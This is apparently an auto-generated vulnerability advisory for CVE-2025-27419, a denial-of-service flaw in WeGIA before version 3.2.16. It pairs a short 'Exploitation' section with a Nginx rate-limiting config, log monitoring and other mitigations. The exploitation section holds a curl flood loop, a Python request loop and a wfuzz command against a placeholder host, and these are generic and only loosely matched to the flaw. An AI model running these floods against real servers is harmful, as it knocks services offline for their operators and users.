WeGIA, Denial of Service (DoS), CVE-2025-27419 (Critical)

Listen to this Post

How the CVE Works:

CVE-2025-27419 is a critical Denial of Service (DoS) vulnerability in WeGIA, an open-source web management platform. The flaw arises from improper handling of recursive crawling of dynamically generated URLs. An unauthenticated attacker can exploit this by sending a high volume of requests, causing the server to process excessive recursive URL generations. This overwhelms system resources, leading to server unresponsiveness. The vulnerability stems from insufficient request throttling and lack of safeguards against aggressive spidering. The issue is resolved in version 3.2.16, which implements better request handling and limits recursive URL processing.

DailyCVE Form:

Platform: WeGIA
Version: < 3.2.16
Vulnerability: Denial of Service
Severity: Critical
Date: 03/03/2025

What Undercode Say:

Exploitation:

1. Exploit Command:

Use a script to send recursive URL requests:

while true; do curl http://target-website.com/dynamic-url-generator; done

2. Python Exploit Script:

import requests
target_url = "http://target-website.com/dynamic-url-generator"
while True:
requests.get(target_url)

3. Tool:

Use tools like `wfuzz` or `Burp Suite` to automate aggressive spidering:

wfuzz -c -z range,1-100000 http://target-website.com/FUZZ

Protection:

  1. Update: Upgrade to WeGIA version 3.2.16 or later.
  2. Rate Limiting: Implement rate limiting using Nginx or Apache:
    limit_req_zone $binary_remote_addr zone=one:10m rate=10r/s;
    location / {
    limit_req zone=one burst=20;
    }

  3. Web Application Firewall (WAF): Deploy a WAF to filter malicious traffic.
  4. Log Monitoring: Monitor logs for unusual request patterns:
    tail -f /var/log/nginx/access.log | grep "dynamic-url-generator"

  5. Code Fix: Add recursive URL generation limits in the application:
    MAX_RECURSION = 10
    def generate_url(recursion_level):
    if recursion_level > MAX_RECURSION:
    raise Exception("Recursion limit exceeded")
    URL generation logic

  6. Testing: Use tools like `OWASP ZAP` to test for DoS vulnerabilities.
  7. Patch Management: Regularly update dependencies and apply security patches.

Analytics:

  • Impact: Critical, affecting server availability.
  • Attack Vector: Network-based, unauthenticated.
  • Complexity: Low, requires minimal technical skill.
  • Mitigation Difficulty: Medium, requires code and infrastructure changes.
  • Affected Systems: WeGIA versions below 3.2.16.
